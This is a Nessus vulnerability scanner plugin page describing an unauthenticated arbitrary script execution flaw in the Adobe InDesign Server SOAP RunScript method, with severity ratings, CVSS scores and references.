Adobe InDesign Server RunScript Arbitrary Command Execution

high Nessus Plugin ID 65127

Language:

Synopsis

A web service running on the remote host has a command execution vulnerability.

Description

The version of Adobe InDesign Server running on the remote host has an arbitrary command execution vulnerability. When the SOAP service is enabled, it processes requests for the RunScript method without requiring authentication. This method can be used to execute arbitrary VBScript on Windows, or AppleScript on Mac OS. A remote, unauthenticated attacker could exploit this to execute arbitrary code.

Solution

There is no known solution at this time.

Plugin Details

Severity: High

ID: 65127

File Name: adobe_indesign_soap_runscript_rce.nasl

Version: 1.5

Type: remote

Family: CGI abuses

Published: 3/8/2013

Updated: 1/19/2021

Supported Sensors: Nessus

Risk Information

CVSS v2

Risk Factor: High

Base Score: 7.5

Temporal Score: 7.1

Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Information

CPE: cpe:/a:adobe:indesign

Excluded KB Items: Settings/disable_cgi_scanning

Exploit Available: true

Exploit Ease: Exploits are available

Exploited by Nessus: true

Vulnerability Publication Date: 11/16/2012

Exploitable With

Metasploit (Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution)

Reference Information

BID: 56574

Secunia: 48572

Detections

Analytics